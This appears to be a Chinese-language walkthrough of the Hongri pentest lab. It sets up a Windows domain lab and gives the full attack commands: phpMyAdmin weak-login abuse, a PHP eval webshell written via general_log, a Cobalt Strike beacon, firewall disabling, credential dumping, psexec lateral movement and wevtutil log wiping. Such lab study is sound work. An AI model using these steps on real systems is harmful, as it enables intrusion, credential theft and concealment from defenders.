红日靶场1

环境搭建

win全靶机密码为hongrisec@2019

修改网卡配置

进入VMware虚拟机 --> 编辑 --> 虚拟网络编辑器,使用两张网卡来构建该靶机环境。修改vmnet1网卡的IP地址为虚拟机中对应的IP地址,NAT网卡一般是随机生成的IP网段可不做不修改(非192.168.52.0/24即可)。

image-20241016213419190

image-20241016213447971

修改各个靶机的设置

win7

添加一张新网卡,一个是内网,一个是外网。再把显示中的加速3D图形关闭

image-20241016214832938

image-20241016214910969

winserver2008R2

修改网卡即可

image-20241016214756199

winserver2003

1、网络适配器修改为刚刚的VMnet1网卡

2、把显示中的加速3D图形关闭

image-20241016214444030

kali预配

image-20241016215115642

修改IP地址。(DHCP获取地址的可忽略)

vim /etc/network/interfaces

image-20241016215908172

更换国内apt源

vim /etc/apt/sources.list

image-20241016220138478

更新apt源

apt update

image-20241016220158563

(可选)语言切换

dpkg-reconfigure locales

使用空格键,把[*]给取消

image-20241016220602080

选中简体中文,按tables键确认

image-20241016220727502

选中简体中文.UTF-8格式,再次确定。后重启即可生效

image-20241016220833028

安装需要使用到的工具

把需要使用的工具上传到kali中并解压

image-20241017123020224

中国蚁剑

先解压到当前目录后使用root用户打开该目录,并执行AntSword文件。

image-20241017123221638

开始初始化,选择一个目录用于存储数据和源码。为了方便这里我选择放在kali的桌面上

image-20241017123255112

image-20241017123433469

等待一段时间让程序下载安装

image-20241017123456447

安装完成后出现两个新的文件。不用管它,直接执行之前目录的AntSword就行

image-20241017124435452

image-20241017124517440

CS(CobaltStrike)

解压至当前目录后,使用超级管理员权限打开然后在打开终端

image-20241017125000608

image-20241017125019031

Server端

进入Server目录后找到teamserver和TeamServerImage这两个文件并赋予执行权

chmod +x teamserver
chmod +x TeamServerImage

image-20241017125323926

启动teamserver。第一个参数是IP地址,第二个参数是密码,IP地址是我们本机的地址,密码任意设置。这里为test

./teamserver 192.168.115.15 test

image-20241017125842006

Client端

进入Client目录打开终端后找到Cobalt_Strike_CN.bat文件赋予执行权

chmod +x Cobalt_Strike_CN.bat

image-20241017130435987

启动 Cobalt Strike 客户端,

image-20241017130459543

输入服务端的IP以及端口、连接密码。我们是在kali中搭建server端的,主机、端口、用户名可保持默认,把密码改成启动server端命令中的密码即可connect

image-20241017130820075

image-20241017130846286

IP地址信息

kali (kali):192.168.115.15
Windows 7 (stu1):192.168.115.131、192.168.52.143
Winserver 2008 (owa):192.168.52.138
Win2k3 (root-tvi862ubeh):192.168.52.141

信息收集

先收集WEB服务器的信息。找ip地址,在用nmap扫描。

扫描WEB服务器的开放端口

nmap 192.168.115.131

image-20241016225854539

详细扫描

nmap -T 4 -A -O 192.168.115.131

image-20241016225947450

扫描网站目录

发现一个phpmyadmin

dirb http://192.168.115.131

image-20241016230044212

漏洞利用

访问phpmyadmin的后台

http://192.168.151.131/phpmyadmin/

尝试使用弱口令登录

成功登录,账号密码为root/root

利用日志getshell上传恶意文件拿shell

查询日志信息

show variables like '%general%';

image-20241016230932954

打开日志读写功能

SET GLOBAL general_log='on';

image-20241016231403686

设置日志文件位置

set global general_log_file ='C:/phpStudy/WWW/2.php';

image-20241016231412338

再次查看日志信息

在查询语句中写入一句话木马

SELECT '<?PHP @eval($_POST["cmd"])?>'

image-20241016232020933

让刚刚命令写入进指定文件,再去执行查看

image-20241016232030897

使用蚁剑连接刚刚的一句话木马

image-20241016232327388

创建监听器

image-20241017151957220

输入kali的主机IP和自定义端口

image-20241017152140877

使用cs创建 windows 可执行 exe 程序

image-20241017152409412

选择刚刚创建的web监听器,把后门保存在桌面

image-20241017152510603

image-20241017152648891

把生成的后门通过蚁剑上传并启动

image-20241017152915649

image-20241017152927035

image-20241017152940973

在打开一个虚拟终端来启动刚刚上传的后门

image-20241017153019983

启动后门,目标上线成功

image-20241017153224100

内网渗透

关闭防火墙

shell netsh advfirewall set allprofiles state off

image-20241017155055718

提权

image-20241017154017121

选择刚刚创建的web监听器

image-20241017154038147

image-20241017154122182

提权成功,拿到System权限

image-20241017154309909

收集信息

使用刚刚拿到的System权限的会话来收集信息

查看网络信息

shell ipconfig

image-20241017155709151

查看用户信息

shell net user

image-20241017155824412

查看当前域或工作组中所有的可见主机

可以点击网络探测或则命令行都可以,执行完毕后将探测出的主机自动添加到cs中

net view

image-20241017172953526

image-20241017172731090

image-20241017173245150

查看端口信息

image-20241017174557367

image-20241017174619950

image-20241017175248548

查看当前的登录域与用户信息

shell net config Workstation

image-20241017164856662

查看有几个域

shell net view /domain

image-20241017164402440

查看域控制器

shell net group "domain controllers" /domain

image-20241017173449826

查看域管理员

shell net group "domain admins" /domain

image-20241017173718241

抓取明文密码

image-20241017170033396

image-20241017170048175

一些查看命令

whoami			#查看当前用户
net start 		#查看当前正在运行的服务
ipconfig /all   #查看本机ip,所在域
route print     #打印路由信息
net view        # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user        # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组
net view /domain         # 查看有几个域
net group 组名 /domain    # 查看域中某工作组
net user 用户名 /domain   # 获取指定域用户的信息
net group "domain admins" /domain  # 查看域管理员
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控
wmic useraccount get /all        #获取域内用户的详细信息

构建socks4a通道

构建socks隧道

image-20241017170306250

自定义一个端口来用作socks代理的端口

image-20241017170348351

修改proxychains4.conf的配置文件中,修改最后一行的端口号改为刚刚设置的端口号

image-20241017170538628

image-20241017170523431

image-20241017170734240

测试

由于kali和web服务器是出于公网环境中的,访问不了内网地址。

使用socks建立一个通往内网的隧道,能打通内网剩下的两台主机与kali之间的联通即为成功。这里使用proxychains代理nmap扫描来做测试

proxychains nmap -sT -sV -Pn -p 22,135,139,445,3389 192.168.52.138

image-20241017180447517

proxychains nmap -sT -sV -Pn -p 22,135,139,445,3389 192.168.52.141

image-20241017180530727

横向移动

创建SMB监听器

image-20241017181110577

横向移动 psexec

image-20241017181151069

选择用户名和密码跟监听器

image-20241017181254237

选择与对端连接的隧道

image-20241017181312255

image-20241017181455821

横向成功

image-20241017181536551

上线成功后可以尝试把对方防火墙关闭

image-20241017182451391

image-20241017182521498

再次横向另一台主机

image-20241017182016775

这里使用的会话是域控制器主机的会话

image-20241017181823819

成功上线

image-20241017182155687

痕迹清理

shell wevtutil cl security              #清理安全日志
shell wevtutil cl system        	    #清理系统日志
shell wevtutil cl application       	#清理应用程序日志
shell wevtutil cl "windows powershell"  #清除power shell日志
shell wevtutil cl Setup     		    #清除(cl)事件日志中的 "Setup" 事件。

在所有被控制的主机上,清楚痕迹

image-20241017211030732